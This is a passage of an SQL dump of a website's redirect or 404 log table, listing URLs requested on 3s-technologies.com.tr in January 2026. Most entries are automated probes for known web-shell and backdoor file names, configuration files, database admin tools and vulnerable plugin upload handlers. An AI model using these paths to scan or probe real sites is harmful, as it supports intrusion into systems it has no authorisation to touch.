00:00:00',301),(55927,'http://mail.3s-technologies.com.tr/tr/oivcl.php',NULL,'','',5,0,'2026-01-12 15:27:16','0000-00-00 00:00:00',301),(55928,'http://mail.3s-technologies.com.tr/tr/images/c99.php',NULL,'','',6,0,'2026-01-12 15:27:21','0000-00-00 00:00:00',301),(55929,'http://mail.3s-technologies.com.tr/tr/output.php',NULL,'','',1,0,'2026-01-12 15:27:27','0000-00-00 00:00:00',301),(55930,'http://mail.3s-technologies.com.tr/tr/.trash7309/fafa',NULL,'','',5,0,'2026-01-12 15:27:33','0000-00-00 00:00:00',301),(55931,'http://mail.3s-technologies.com.tr/tr/dr.php',NULL,'','',7,0,'2026-01-12 15:27:38','0000-00-00 00:00:00',301),(55932,'http://mail.3s-technologies.com.tr/tr/wp-includes/blocks',NULL,'','',5,0,'2026-01-12 15:27:39','0000-00-00 00:00:00',301),(55933,'http://mail.3s-technologies.com.tr/tr/blog/byp.php',NULL,'','',1,0,'2026-01-12 15:27:42','0000-00-00 00:00:00',301),(55934,'http://mail.3s-technologies.com.tr/tr/bhfnd.php',NULL,'','',1,0,'2026-01-12 15:27:44','0000-00-00 00:00:00',301),(55935,'http://mail.3s-technologies.com.tr/tr/aku.php',NULL,'','',1,0,'2026-01-12 15:27:48','0000-00-00 00:00:00',301),(55936,'http://mail.3s-technologies.com.tr/tr/weozh.php',NULL,'','',1,0,'2026-01-12 15:27:56','0000-00-00 00:00:00',301),(55937,'http://mail.3s-technologies.com.tr/tr/zznmg.php',NULL,'','',1,0,'2026-01-12 15:28:00','0000-00-00 00:00:00',301),(55938,'http://mail.3s-technologies.com.tr/tr/help/crnpwfiu.php',NULL,'','',2,0,'2026-01-12 15:28:01','0000-00-00 00:00:00',301),(55939,'http://mail.3s-technologies.com.tr/tr/eru.php',NULL,'','',1,0,'2026-01-12 15:28:02','0000-00-00 00:00:00',301),(55940,'http://mail.3s-technologies.com.tr/tr/index/zwso.php',NULL,'','',1,0,'2026-01-12 15:28:03','0000-00-00 00:00:00',301),(55941,'http://mail.3s-technologies.com.tr/tr/images/2008.php',NULL,'','',2,0,'2026-01-12 15:28:05','0000-00-00 00:00:00',301),(55942,'http://mail.3s-technologies.com.tr/tr/.cache/x.php',NULL,'','',5,0,'2026-01-12 15:28:06','0000-00-00 00:00:00',301),(55943,'http://mail.3s-technologies.com.tr/tr/mtos/byp.php',NULL,'','',1,0,'2026-01-12 15:28:11','0000-00-00 00:00:00',301),(55944,'http://mail.3s-technologies.com.tr/tr/wp-includes/customize/index.php',NULL,'','',13,0,'2026-01-12 15:28:13','0000-00-00 00:00:00',301),(55945,'http://mail.3s-technologies.com.tr/tr/pkmoj.php',NULL,'','',1,0,'2026-01-12 15:28:14','0000-00-00 00:00:00',301),(55946,'http://mail.3s-technologies.com.tr/tr/uploads/upload2.php',NULL,'','',1,0,'2026-01-12 15:28:15','0000-00-00 00:00:00',301),(55947,'http://mail.3s-technologies.com.tr/tr/hehehehe.php',NULL,'','',2,0,'2026-01-12 15:28:16','0000-00-00 00:00:00',301),(55948,'http://mail.3s-technologies.com.tr/tr/fss.php',NULL,'','',2,0,'2026-01-12 15:28:17','0000-00-00 00:00:00',301),(55949,'http://mail.3s-technologies.com.tr/tr/wwr.php',NULL,'','',1,0,'2026-01-12 15:28:18','0000-00-00 00:00:00',301),(55950,'http://mail.3s-technologies.com.tr/tr/wp-content/kj.php',NULL,'','',1,0,'2026-01-12 15:28:20','0000-00-00 00:00:00',301),(55951,'http://mail.3s-technologies.com.tr/tr/update/wpupex.php',NULL,'','',7,0,'2026-01-12 15:28:21','0000-00-00 00:00:00',301),(55952,'http://mail.3s-technologies.com.tr/tr/kopyw.php',NULL,'','',1,0,'2026-01-12 15:28:24','0000-00-00 00:00:00',301),(55953,'http://mail.3s-technologies.com.tr/tr/wp-includes/css/about.php',NULL,'','',15,0,'2026-01-12 15:28:26','0000-00-00 00:00:00',301),(55954,'http://mail.3s-technologies.com.tr/tr/wp-content/uploads/2024/dodo.php',NULL,'','',2,0,'2026-01-12 15:28:31','0000-00-00 00:00:00',301),(55955,'http://mail.3s-technologies.com.tr/tr/wp-includes/images/403.php',NULL,'','',1,0,'2026-01-12 15:28:35','0000-00-00 00:00:00',301),(55956,'http://mail.3s-technologies.com.tr/tr/~elliotimformatiq/sxp.php',NULL,'','',1,0,'2026-01-12 15:28:36','0000-00-00 00:00:00',301),(55957,'http://mail.3s-technologies.com.tr/tr/qfvqu.php',NULL,'','',1,0,'2026-01-12 15:28:37','0000-00-00 00:00:00',301),(55958,'http://mail.3s-technologies.com.tr/tr/crt.php',NULL,'','',1,0,'2026-01-12 15:28:38','0000-00-00 00:00:00',301),(55959,'http://mail.3s-technologies.com.tr/tr/nka.php',NULL,'','',1,0,'2026-01-12 15:28:43','0000-00-00 00:00:00',301),(55960,'http://mail.3s-technologies.com.tr/tr/wp-includes/text/wp-login.php',NULL,'','',6,0,'2026-01-12 15:28:46','0000-00-00 00:00:00',301),(55961,'http://mail.3s-technologies.com.tr/tr/jvcpa.php',NULL,'','',1,0,'2026-01-12 15:28:48','0000-00-00 00:00:00',301),(55962,'http://mail.3s-technologies.com.tr/tr/zil.php',NULL,'','',1,0,'2026-01-12 15:28:49','0000-00-00 00:00:00',301),(55963,'http://mail.3s-technologies.com.tr/tr/images/uploadform.php',NULL,'','',2,0,'2026-01-12 15:28:50','0000-00-00 00:00:00',301),(55964,'http://mail.3s-technologies.com.tr/tr/wordpress/clo.php',NULL,'','',1,0,'2026-01-12 15:28:53','0000-00-00 00:00:00',301),(55965,'http://mail.3s-technologies.com.tr/tr/.well-known/zip.php',NULL,'','',1,0,'2026-01-12 15:28:54','0000-00-00 00:00:00',301),(55966,'http://mail.3s-technologies.com.tr/tr/wordpress/yts.php',NULL,'','',1,0,'2026-01-12 15:28:57','0000-00-00 00:00:00',301);
INSERT INTO `fz6t4_redirect_links` VALUES (55967,'http://mail.3s-technologies.com.tr/tr/wp-admin/images/mhbgf.php',NULL,'','',1,0,'2026-01-12 15:28:59','0000-00-00 00:00:00',301),(55968,'http://mail.3s-technologies.com.tr/tr/wp-admin/maint',NULL,'','',6,0,'2026-01-12 15:29:00','0000-00-00 00:00:00',301),(55969,'http://mail.3s-technologies.com.tr/tr/first.php',NULL,'','',5,0,'2026-01-12 15:29:01','0000-00-00 00:00:00',301),(55970,'http://mail.3s-technologies.com.tr/tr/wp/wp-includes/index.php',NULL,'','',5,0,'2026-01-12 15:29:05','0000-00-00 00:00:00',301),(55971,'http://mail.3s-technologies.com.tr/tr/museu/yhweq.php',NULL,'','',5,0,'2026-01-12 15:29:06','0000-00-00 00:00:00',301),(55972,'http://www.3s-technologies.com.tr/tr/storage/logs',NULL,'','',1,0,'2026-01-12 18:16:19','0000-00-00 00:00:00',301),(55973,'http://www.3s-technologies.com.tr/tr/vendor',NULL,'','',1,0,'2026-01-12 18:16:33','0000-00-00 00:00:00',301),(55974,'http://3s-technologies.com.tr/en/public/fonts/index.php',NULL,'https://www.yahoo.com/','',4,0,'2026-01-12 19:00:49','0000-00-00 00:00:00',301),(55975,'https://3s-technologies.com.tr/en/wp-json/wp/v2',NULL,'','',6,0,'2026-01-12 20:37:06','0000-00-00 00:00:00',301),(55976,'https://3s-technologies.com.tr/en/wp-includes/js/wp-emoji-release.min.js',NULL,'https://www.google.jp/search?q=wordpress','',3,0,'2026-01-12 20:37:07','0000-00-00 00:00:00',301),(55977,'http://3s-technologies.com.tr/en/pvnlmjku',NULL,'','',3,0,'2026-01-12 22:26:04','0000-00-00 00:00:00',301),(55978,'https://3s-technologies.com.tr/en/fslawrbu',NULL,'','',3,0,'2026-01-12 22:26:04','0000-00-00 00:00:00',301),(55979,'https://3s-technologies.com.tr/tr/favicon.png',NULL,'','',2,0,'2026-01-12 23:30:51','0000-00-00 00:00:00',301),(55980,'https://3s-technologies.com.tr/tr/tr.zip',NULL,'','',1,0,'2026-01-12 23:41:04','0000-00-00 00:00:00',301),(55981,'https://3s-technologies.com.tr/en/js/twint_ch.js',NULL,'https://3s-technologies.com.tr/js/twint_ch.js','',1,0,'2026-01-13 04:49:53','0000-00-00 00:00:00',301),(55982,'https://3s-technologies.com.tr/en/js/lkk_ch.js',NULL,'https://3s-technologies.com.tr/js/lkk_ch.js','',1,0,'2026-01-13 04:49:55','0000-00-00 00:00:00',301),(55983,'https://3s-technologies.com.tr/en/css/support_parent.css',NULL,'https://3s-technologies.com.tr/css/support_parent.css','',1,0,'2026-01-13 04:50:01','0000-00-00 00:00:00',301),(55984,'https://3s-technologies.com.tr/tr/jwallpapers_files/plupload/codeb0ss_2023.php',NULL,'','',1,0,'2026-01-13 10:38:48','0000-00-00 00:00:00',301),(55985,'https://3s-technologies.com.tr/tr/administrator/components/com_rokdownloads/assets/uploadhandler.php',NULL,'','',1,0,'2026-01-13 10:39:31','0000-00-00 00:00:00',301),(55986,'https://3s-technologies.com.tr/administrator/components/com_rokdownloads/assets/uploadhandler.php',NULL,'','',1,0,'2026-01-13 10:41:03','0000-00-00 00:00:00',301),(55987,'https://3s-technologies.com.tr/tr/images/stories/codeb0ss_2023.php',NULL,'','',1,0,'2026-01-13 10:42:19','0000-00-00 00:00:00',301),(55988,'http://mail.3s-technologies.com.tr/en/sk-park.php',NULL,'','',2,0,'2026-01-13 16:48:09','0000-00-00 00:00:00',301),(55989,'http://mail.3s-technologies.com.tr/en/wp-includes/functions.php',NULL,'','',2,0,'2026-01-13 16:48:09','0000-00-00 00:00:00',301),(55990,'http://mail.3s-technologies.com.tr/en/wp-content/plugins/convertplug/convertplug.php',NULL,'','',1,0,'2026-01-13 16:48:10','0000-00-00 00:00:00',301),(55991,'http://mail.3s-technologies.com.tr/en/wp-content/plugins/cdekdelivery/cdek.php',NULL,'','',1,0,'2026-01-13 16:48:11','0000-00-00 00:00:00',301),(55992,'http://mail.3s-technologies.com.tr/en/wp-settings.php',NULL,'','',2,0,'2026-01-13 16:48:12','0000-00-00 00:00:00',301),(55993,'http://mail.3s-technologies.com.tr/en/wp-includes/pluggable.php',NULL,'','',2,0,'2026-01-13 16:48:13','0000-00-00 00:00:00',301),(55994,'http://mail.3s-technologies.com.tr/en/flexoacademy.com/wp-includes/class-wp-hook.php',NULL,'','',1,0,'2026-01-13 16:48:14','0000-00-00 00:00:00',301),(55995,'http://mail.3s-technologies.com.tr/en/app/http/controllers/contactcontroller.php',NULL,'','',1,0,'2026-01-13 16:48:15','0000-00-00 00:00:00',301),(55996,'http://mail.3s-technologies.com.tr/en/resources/views/layouts/main.blade.php',NULL,'','',1,0,'2026-01-13 16:48:19','0000-00-00 00:00:00',301),(55997,'http://mail.3s-technologies.com.tr/en/storage/framework/views/82a7b40d8e135fd3ca9cce3df185adac.php',NULL,'','',1,0,'2026-01-13 16:48:20','0000-00-00 00:00:00',301),(55998,'http://mail.3s-technologies.com.tr/en/app/http/controllers/captchacontroller.php',NULL,'','',1,0,'2026-01-13 16:48:22','0000-00-00 00:00:00',301),(55999,'http://mail.3s-technologies.com.tr/en/analyze_08/analyze.php',NULL,'','',1,0,'2026-01-13 16:48:23','0000-00-00 00:00:00',301),(56000,'http://mail.3s-technologies.com.tr/en/newsite/wp-includes/functions.php',NULL,'','',1,0,'2026-01-13 16:48:24','0000-00-00 00:00:00',301),(56001,'http://mail.3s-technologies.com.tr/en/newsite/wp-admin/includes/misc.php',NULL,'','',1,0,'2026-01-13 16:48:25','0000-00-00 00:00:00',301),(56002,'http://mail.3s-technologies.com.tr/en/newsite/wp-admin/admin-header.php',NULL,'','',1,0,'2026-01-13 16:48:26','0000-00-00 00:00:00',301),(56003,'http://mail.3s-technologies.com.tr/en/wp-includes/update.php',NULL,'','',1,0,'2026-01-13 16:48:27','0000-00-00 00:00:00',301),(56004,'http://mail.3s-technologies.com.tr/en/wp-content/themes/autoloader.php',NULL,'','',1,0,'2026-01-13 16:48:28','0000-00-00 00:00:00',301),(56005,'http://mail.3s-technologies.com.tr/en/wp-content/themes/r-and-t/functions.php',NULL,'','',1,0,'2026-01-13 16:48:29','0000-00-00 00:00:00',301),(56006,'http://mail.3s-technologies.com.tr/en/wp-admin/includes/theme.php',NULL,'','',1,0,'2026-01-13 16:48:29','0000-00-00 00:00:00',301),(56007,'http://mail.3s-technologies.com.tr/en/wp-blog-header.php',NULL,'','',1,0,'2026-01-13 16:48:30','0000-00-00 00:00:00',301),(56008,'http://mail.3s-technologies.com.tr/en/wp-config.php',NULL,'','',1,0,'2026-01-13 16:48:32','0000-00-00 00:00:00',301),(56009,'http://mail.3s-technologies.com.tr/en/wp-includes/template-loader.php',NULL,'','',1,0,'2026-01-13 16:48:33','0000-00-00 00:00:00',301),(56010,'http://mail.3s-technologies.com.tr/en/themes/onepress/home.php',NULL,'','',1,0,'2026-01-13 16:48:34','0000-00-00 00:00:00',301),(56011,'http://mail.3s-technologies.com.tr/en/themes/child/header.php',NULL,'','',1,0,'2026-01-13 16:48:35','0000-00-00 00:00:00',301),(56012,'http://mail.3s-technologies.com.tr/en/themes/onepress/single.php',NULL,'','',1,0,'2026-01-13 16:48:36','0000-00-00 00:00:00',301),(56013,'http://mail.3s-technologies.com.tr/en/themes/onepress/archive.php',NULL,'','',1,0,'2026-01-13 16:48:37','0000-00-00 00:00:00',301),(56014,'http://mail.3s-technologies.com.tr/en/themes/onepress/page.php',NULL,'','',1,0,'2026-01-13 16:48:38','0000-00-00 00:00:00',301),(56015,'http://mail.3s-technologies.com.tr/en/cloner/websocket.php',NULL,'','',1,0,'2026-01-13 16:48:38','0000-00-00 00:00:00',301),(56016,'http://mail.3s-technologies.com.tr/en/mu-plugins/0-worker.php',NULL,'','',1,0,'2026-01-13 16:48:39','0000-00-00 00:00:00',301),(56017,'http://mail.3s-technologies.com.tr/en/plugins/worker/init.php',NULL,'','',1,0,'2026-01-13 16:48:40','0000-00-00 00:00:00',301),(56018,'http://mail.3s-technologies.com.tr/en/themes/onepress/sidebar.php',NULL,'','',1,0,'2026-01-13 16:48:41','0000-00-00 00:00:00',301),(56019,'http://mail.3s-technologies.com.tr/en/wp-includes/wp-db.php',NULL,'','',1,0,'2026-01-13 16:48:43','0000-00-00 00:00:00',301),(56020,'http://mail.3s-technologies.com.tr/en/wp-includes/class-wp-query.php',NULL,'','',1,0,'2026-01-13 16:48:44','0000-00-00 00:00:00',301),(56021,'http://mail.3s-technologies.com.tr/en/abspathwp-includes/version.php',NULL,'','',1,0,'2026-01-13 16:48:45','0000-00-00 00:00:00',301),(56022,'http://mail.3s-technologies.com.tr/en/wp-includes/class-wp-customize-widgets.php',NULL,'','',1,0,'2026-01-13 16:48:46','0000-00-00 00:00:00',301),(56023,'http://mail.3s-technologies.com.tr/en/wp-content/themes/lisli_emi/header.php',NULL,'','',1,0,'2026-01-13 16:48:47','0000-00-00 00:00:00',301),(56024,'http://mail.3s-technologies.com.tr/en/plugins/duplicator/uninstall.php',NULL,'','',1,0,'2026-01-13 16:48:48','0000-00-00 00:00:00',301),(56025,'http://mail.3s-technologies.com.tr/en/wp-includes/class-wpdb.php',NULL,'','',1,0,'2026-01-13 16:48:49','0000-00-00 00:00:00',301),(56026,'http://mail.3s-technologies.com.tr/en/wp-includes/canonical.php',NULL,'','',1,0,'2026-01-13 16:48:49','0000-00-00 00:00:00',301),(56027,'http://mail.3s-technologies.com.tr/en/wp-content/plugins/ozh-click-counter/wp_ozh_clickcounter.php',NULL,'','',1,0,'2026-01-13 16:48:50','0000-00-00 00:00:00',301),(56028,'http://mail.3s-technologies.com.tr/en/wp-includes/class-wp-hook.php',NULL,'','',2,0,'2026-01-13 16:48:51','0000-00-00 00:00:00',301),(56029,'http://mail.3s-technologies.com.tr/en/wp-includes/plugin.php',NULL,'','',1,0,'2026-01-13 16:48:52','0000-00-00 00:00:00',301),(56030,'http://mail.3s-technologies.com.tr/en/wp-includes/formatting.php',NULL,'','',1,0,'2026-01-13 16:48:53','0000-00-00 00:00:00',301),(56031,'http://mail.3s-technologies.com.tr/en/wp-includes/post-template.php',NULL,'','',1,0,'2026-01-13 16:48:54','0000-00-00 00:00:00',301),(56032,'http://mail.3s-technologies.com.tr/en/wp-content/plugins/search-filter/search-filter.php',NULL,'','',1,0,'2026-01-13 16:48:55','0000-00-00 00:00:00',301),(56033,'http://mail.3s-technologies.com.tr/en/wp-includes/template.php',NULL,'','',2,0,'2026-01-13 16:48:56','0000-00-00 00:00:00',301),(56034,'http://mail.3s-technologies.com.tr/en/wp-includes/general-template.php',NULL,'','',1,0,'2026-01-13 16:48:57','0000-00-00 00:00:00',301),(56035,'http://mail.3s-technologies.com.tr/en/wp-content/plugins/w3-total-cache/pgcache_contentgrabber.php',NULL,'','',1,0,'2026-01-13 16:48:57','0000-00-00 00:00:00',301),(56036,'http://mail.3s-technologies.com.tr/en/themes/flash/page.php',NULL,'','',1,0,'2026-01-13 16:48:58','0000-00-00 00:00:00',301),(56037,'http://mail.3s-technologies.com.tr/en/themes/flash/header.php',NULL,'','',1,0,'2026-01-13 16:48:59','0000-00-00 00:00:00',301),(56038,'http://mail.3s-technologies.com.tr/en/wer.php',NULL,'','',1,0,'2026-01-13 16:49:00','0000-00-00 00:00:00',301),(56039,'http://mail.3s-technologies.com.tr/en/crouter.php',NULL,'','',1,0,'2026-01-13 16:49:01','0000-00-00 00:00:00',301),(56040,'http://mail.3s-technologies.com.tr/en/sites/default/composer.php',NULL,'','',1,0,'2026-01-13 16:49:02','0000-00-00 00:00:00',301),(56041,'http://mail.3s-technologies.com.tr/en/copyright.php',NULL,'','',1,0,'2026-01-13 16:49:03','0000-00-00 00:00:00',301),(56042,'http://mail.3s-technologies.com.tr/en/sites/default/settingsm.php',NULL,'','',1,0,'2026-01-13 16:49:04','0000-00-00 00:00:00',301),(56043,'http://mail.3s-technologies.com.tr/en/wp-admin/includes/class-wp-upgrader-skin.php',NULL,'','',1,0,'2026-01-13 16:49:05','0000-00-00 00:00:00',301),(56044,'http://mail.3s-technologies.com.tr/en/lanceros.es/wp-settings.php',NULL,'','',1,0,'2026-01-13 16:49:06','0000-00-00 00:00:00',301),(56045,'http://mail.3s-technologies.com.tr/en/lanceros.es/wp-config.php',NULL,'','',1,0,'2026-01-13 16:49:07','0000-00-00 00:00:00',301),(56046,'http://mail.3s-technologies.com.tr/en/abspathwp-includes/load.php',NULL,'','',1,0,'2026-01-13 16:49:08','0000-00-00 00:00:00',301),(56047,'http://mail.3s-technologies.com.tr/en/lanceros.es/wp-admin/includes/update-core.php',NULL,'','',1,0,'2026-01-13 16:49:09','0000-00-00 00:00:00',301),(56048,'http://mail.3s-technologies.com.tr/en/themes/twentyfourteen/index.php',NULL,'','',1,0,'2026-01-13 16:49:09','0000-00-00 00:00:00',301),(56049,'http://mail.3s-technologies.com.tr/en/themes/twentyfourteen/sidebar.php',NULL,'','',1,0,'2026-01-13 16:49:10','0000-00-00 00:00:00',301),(56050,'http://mail.3s-technologies.com.tr/en/themes/twentyfourteen/page.php',NULL,'','',1,0,'2026-01-13 16:49:11','0000-00-00 00:00:00',301),(56051,'http://mail.3s-technologies.com.tr/en/themes/twentyfourteen/single.php',NULL,'','',1,0,'2026-01-13 16:49:12','0000-00-00 00:00:00',301),(56052,'http://mail.3s-technologies.com.tr/en/themes/twentyfourteen/author.php',NULL,'','',1,0,'2026-01-13 16:49:13','0000-00-00 00:00:00',301),(56053,'http://mail.3s-technologies.com.tr/en/themes/twentyfourteen/404.php',NULL,'','',1,0,'2026-01-13 16:49:14','0000-00-00 00:00:00',301),(56054,'http://mail.3s-technologies.com.tr/en/themes/twentyfourteen/tag.php',NULL,'','',1,0,'2026-01-13 16:49:15','0000-00-00 00:00:00',301),(56055,'http://mail.3s-technologies.com.tr/en/lanceros.es/wp-includes/class-wp-xmlrpc-server.php',NULL,'','',1,0,'2026-01-13 16:49:16','0000-00-00 00:00:00',301),(56056,'http://mail.3s-technologies.com.tr/en/admin-ajax.php',NULL,'','',1,0,'2026-01-13 16:49:17','0000-00-00 00:00:00',301),(56057,'http://mail.3s-technologies.com.tr/en/themes.php',NULL,'','',1,0,'2026-01-13 16:49:18','0000-00-00 00:00:00',301),(56058,'http://mail.3s-technologies.com.tr/en/profile.php',NULL,'','',1,0,'2026-01-13 16:49:19','0000-00-00 00:00:00',301),(56059,'http://mail.3s-technologies.com.tr/en/wp-content/plugins/php-compatibility-checker/wpengine-phpcompat.php',NULL,'','',1,0,'2026-01-13 16:49:20','0000-00-00 00:00:00',301),(56060,'http://mail.3s-technologies.com.tr/en/usr/share/phpmyadmin/server_import.php',NULL,'','',1,0,'2026-01-13 16:49:21','0000-00-00 00:00:00',301),(56061,'http://mail.3s-technologies.com.tr/en/wp-admin/plugins.php',NULL,'','',1,0,'2026-01-13 16:49:22','0000-00-00 00:00:00',301),(56062,'http://mail.3s-technologies.com.tr/en/bocabravaproperties.com/wp-includes/compat.php',NULL,'','',1,0,'2026-01-13 16:49:23','0000-00-00 00:00:00',301),(56063,'http://mail.3s-technologies.com.tr/en/ability-tw.com/wp-settings.php',NULL,'','',1,0,'2026-01-13 16:49:24','0000-00-00 00:00:00',301),(56064,'http://mail.3s-technologies.com.tr/en/w/index.php',NULL,'','',1,0,'2026-01-13 16:49:25','0000-00-00 00:00:00',301),(56065,'http://mail.3s-technologies.com.tr/en/w/content/tracking.php',NULL,'','',1,0,'2026-01-13 16:49:26','0000-00-00 00:00:00',301),(56066,'http://mail.3s-technologies.com.tr/en/w/app/core/assist.php',NULL,'','',1,0,'2026-01-13 16:49:27','0000-00-00 00:00:00',301),(56067,'http://mail.3s-technologies.com.tr/en/w/app/core/basic.php',NULL,'','',1,0,'2026-01-13 16:49:28','0000-00-00 00:00:00',301),(56068,'http://mail.3s-technologies.com.tr/en/w/app/core/full.php',NULL,'','',1,0,'2026-01-13 16:49:29','0000-00-00 00:00:00',301),(56069,'http://mail.3s-technologies.com.tr/en/w/app/core/extensions.php',NULL,'','',1,0,'2026-01-13 16:49:30','0000-00-00 00:00:00',301),(56070,'http://mail.3s-technologies.com.tr/en/w/corrected.php',NULL,'','',1,0,'2026-01-13 16:49:31','0000-00-00 00:00:00',301),(56071,'http://3s-technologies.com.tr/en/assets/images/index.php',NULL,'https://www.yahoo.com/','',3,0,'2026-01-13 18:31:17','0000-00-00 00:00:00',301),(56072,'http://3s-technologies.com.tr/en/public/vx.php',NULL,'https://www.bing.com/','',3,0,'2026-01-13 18:31:34','0000-00-00 00:00:00',301),(56073,'http://3s-technologies.com.tr/en/wa/index.php',NULL,'https://www.google.fr/','',3,0,'2026-01-13 18:31:39','0000-00-00 00:00:00',301),(56074,'http://3s-technologies.com.tr/en/wp-admin/class-db.php',NULL,'https://www.yahoo.com/','',3,0,'2026-01-13 18:31:41','0000-00-00 00:00:00',301),(56075,'http://3s-technologies.com.tr/en/wp-admin/product.php',NULL,'https://www.yahoo.com/','',3,0,'2026-01-13 18:31:48','0000-00-00 00:00:00',301),(56076,'http://3s-technologies.com.tr/en/wp-includes/css/dist',NULL,'https://www.google.com/','',3,0,'2026-01-13 18:32:01','0000-00-00 00:00:00',301),(56077,'http://3s-technologies.com.tr/tr/glx6w.php',NULL,'','',2,0,'2026-01-13 18:41:59','0000-00-00 00:00:00',301),(56078,'http://3s-technologies.com.tr/tr/jatest4.php',NULL,'','',1,0,'2026-01-13 18:42:02','0000-00-00 00:00:00',301),(56079,'http://3s-technologies.com.tr/tr/xnitp.php',NULL,'','',1,0,'2026-01-13 18:42:07','0000-00-00 00:00:00',301),(56080,'http://3s-technologies.com.tr/tr/cyber.php',NULL,'','',1,0,'2026-01-13 18:42:08','0000-00-00 00:00:00',301),(56081,'http://3s-technologies.com.tr/tr/iabzy.php',NULL,'','',1,0,'2026-01-13 18:42:14','0000-00-00 00:00:00',301),(56082,'http://3s-technologies.com.tr/tr/accesson1.php',NULL,'','',1,0,'2026-01-13 18:42:16','0000-00-00 00:00:00',301),(56083,'http://3s-technologies.com.tr/tr/chitchatback.php',NULL,'','',1,0,'2026-01-13 18:42:21','0000-00-00 00:00:00',301),(56084,'http://3s-technologies.com.tr/tr/wp-bapbc.php',NULL,'','',1,0,'2026-01-13 18:42:25','0000-00-00 00:00:00',301),(56085,'http://3s-technologies.com.tr/tr/modules.php',NULL,'','',1,0,'2026-01-13 18:42:28','0000-00-00 00:00:00',301),(56086,'http://3s-technologies.com.tr/tr/a/index.php',NULL,'','',1,0,'2026-01-13 18:42:32','0000-00-00 00:00:00',301),(56087,'http://3s-technologies.com.tr/tr/wxdxn.php',NULL,'','',1,0,'2026-01-13 18:42:42','0000-00-00 00:00:00',301),(56088,'http://3s-technologies.com.tr/tr/nsexz.php',NULL,'','',1,0,'2026-01-13 18:42:44','0000-00-00 00:00:00',301),(56089,'http://3s-technologies.com.tr/tr/vxnxvgfw.php',NULL,'','',1,0,'2026-01-13 18:42:46','0000-00-00 00:00:00',301),(56090,'http://3s-technologies.com.tr/tr/wp-god.php',NULL,'','',1,0,'2026-01-13 18:42:48','0000-00-00 00:00:00',301),(56091,'http://3s-technologies.com.tr/tr/pfbc/form.php',NULL,'','',1,0,'2026-01-13 18:42:52','0000-00-00 00:00:00',301),(56092,'http://3s-technologies.com.tr/tr/1234.php',NULL,'','',1,0,'2026-01-13 18:42:58','0000-00-00 00:00:00',301),(56093,'http://3s-technologies.com.tr/tr/slsqc.php',NULL,'','',1,0,'2026-01-13 18:43:14','0000-00-00 00:00:00',301),(56094,'http://3s-technologies.com.tr/tr/ws34.php',NULL,'','',4,0,'2026-01-13 18:43:15','0000-00-00 00:00:00',301),(56095,'http://3s-technologies.com.tr/tr/wp-includes/pomo/alfa.php',NULL,'','',1,0,'2026-01-13 18:43:17','0000-00-00 00:00:00',301),(56096,'http://3s-technologies.com.tr/tr/delete3.php',NULL,'','',2,0,'2026-01-13 18:43:32','0000-00-00 00:00:00',301),(56097,'http://www.3s-technologies.com.tr/tr/assets/images/hehe.php',NULL,'','',1,0,'2026-01-13 19:20:51','0000-00-00 00:00:00',301),(56098,'http://www.3s-technologies.com.tr/tr/wp-conter.php',NULL,'','',1,0,'2026-01-13 19:20:52','0000-00-00 00:00:00',301),(56099,'http://www.3s-technologies.com.tr/tr/ua/index_old.php',NULL,'','',1,0,'2026-01-13 19:20:52','0000-00-00 00:00:00',301),(56100,'http://www.3s-technologies.com.tr/tr/wp-content/themes/seotheme/radio.php',NULL,'','',1,0,'2026-01-13 19:20:53','0000-00-00 00:00:00',301),(56101,'http://www.3s-technologies.com.tr/tr/wp-admin/js/upgrade.php',NULL,'','',1,0,'2026-01-13 19:20:54','0000-00-00 00:00:00',301),(56102,'http://www.3s-technologies.com.tr/tr/wp-adminmaintmailer.php',NULL,'','',1,0,'2026-01-13 19:20:55','0000-00-00 00:00:00',301),(56103,'http://www.3s-technologies.com.tr/en/ru/adminer-4.2.4.php',NULL,'','',1,0,'2026-01-13 19:20:56','0000-00-00 00:00:00',301),(56104,'http://www.3s-technologies.com.tr/en/assets/uploads/alfacgiapi/404.php',NULL,'','',1,0,'2026-01-13 19:20:57','0000-00-00 00:00:00',301),(56105,'http://www.3s-technologies.com.tr/en/test/adminer-4.6.1-mysql-en.php',NULL,'','',1,0,'2026-01-13 19:20:58','0000-00-00 00:00:00',301),(56106,'http://www.3s-technologies.com.tr/en/hvoxejcn.php',NULL,'','',1,0,'2026-01-13 19:20:58','0000-00-00 00:00:00',301),(56107,'http://www.3s-technologies.com.tr/en/rasp.php',NULL,'','',1,0,'2026-01-13 19:20:59','0000-00-00 00:00:00',301),(56108,'http://www.3s-technologies.com.tr/en/sk-park.php',NULL,'','',1,0,'2026-01-13 19:21:00','0000-00-00 00:00:00',301),(56109,'http://www.3s-technologies.com.tr/en/wp-includes/functions.php',NULL,'','',2,0,'2026-01-13 19:21:01','0000-00-00 00:00:00',301),(56110,'http://www.3s-technologies.com.tr/en/wp-content/plugins/convertplug/convertplug.php',NULL,'','',1,0,'2026-01-13 19:21:01','0000-00-00 00:00:00',301),(56111,'http://www.3s-technologies.com.tr/en/wp-content/plugins/cdekdelivery/cdek.php',NULL,'','',1,0,'2026-01-13 19:21:02','0000-00-00 00:00:00',301),(56112,'http://www.3s-technologies.com.tr/en/wp-settings.php',NULL,'','',1,0,'2026-01-13 19:21:03','0000-00-00 00:00:00',301),(56113,'http://www.3s-technologies.com.tr/en/wp-includes/pluggable.php',NULL,'','',1,0,'2026-01-13 19:21:04','0000-00-00 00:00:00',301),(56114,'http://www.3s-technologies.com.tr/en/flexoacademy.com/wp-includes/class-wp-hook.php',NULL,'','',1,0,'2026-01-13 19:21:05','0000-00-00 00:00:00',301),(56115,'http://www.3s-technologies.com.tr/en/app/http/controllers/contactcontroller.php',NULL,'','',1,0,'2026-01-13 19:21:05','0000-00-00 00:00:00',301),(56116,'http://www.3s-technologies.com.tr/en/resources/views/layouts/main.blade.php',NULL,'','',1,0,'2026-01-13 19:21:08','0000-00-00 00:00:00',301),(56117,'http://www.3s-technologies.com.tr/en/storage/framework/views/82a7b40d8e135fd3ca9cce3df185adac.php',NULL,'','',1,0,'2026-01-13 19:21:09','0000-00-00 00:00:00',301),(56118,'http://www.3s-technologies.com.tr/en/app/http/controllers/captchacontroller.php',NULL,'','',1,0,'2026-01-13 19:21:11','0000-00-00 00:00:00',301),(56119,'http://www.3s-technologies.com.tr/en/analyze_08/analyze.php',NULL,'','',1,0,'2026-01-13 19:21:12','0000-00-00 00:00:00',301),(56120,'http://www.3s-technologies.com.tr/en/newsite/wp-includes/functions.php',NULL,'','',1,0,'2026-01-13 19:21:12','0000-00-00 00:00:00',301),(56121,'http://www.3s-technologies.com.tr/en/newsite/wp-admin/includes/misc.php',NULL,'','',1,0,'2026-01-13 19:21:13','0000-00-00 